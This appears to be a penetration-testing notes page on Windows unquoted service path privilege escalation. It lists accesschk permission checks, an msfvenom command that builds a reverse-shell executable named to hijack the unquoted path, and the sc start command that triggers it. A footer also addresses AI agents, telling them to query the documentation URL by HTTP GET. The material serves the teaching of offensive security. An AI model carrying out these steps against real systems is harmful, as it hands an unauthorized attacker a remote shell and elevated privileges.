# Unquoted Service Path If there is space between the path and it is not enclosed in double quotes then we can exploit it. C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe Here the execution will take place like: Program.exe Files.exe Program Files Unquoted.exe Path.exe etc ``` #Check if we have permissions to start the service: accesschk /accepteula -ucqv user unquoted #Check for write permissions in each directory: accesschk /accepteula -uwdq C:\ accesschk /accepteula -uwdq "C:\Program Files\" accesschk /accepteula -uwdq "C:\Program Files\Unquoted Path Service\" #Create a reverse shell file msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=4444 -f exe -o Common.exe #We used common.exe name because there is directory Common Files and as there are no quotes, it will execute Common.exe first. #Start the listener and start the service sc start unquotedsvc #You will get shell ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://coffeetohack.gitbook.io/coffeetohack/windows/unq.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.